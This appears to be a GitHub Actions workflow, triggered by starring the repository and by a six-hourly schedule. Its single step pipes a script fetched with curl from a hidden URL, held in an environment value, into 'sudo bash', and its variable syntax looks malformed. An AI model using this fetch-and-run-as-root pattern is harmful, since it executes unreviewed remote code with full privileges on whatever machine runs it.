name: GDzc
on:
  watch:
    types: started
  schedule:
    - cron:  '0 */6 * * *'
jobs:
  GD:
    runs-on: ubuntu-latest
    steps:
    - name: zc
      env:
        SHELL: ${{ SHELL }}
      run: curl $SHELL | sudo bash
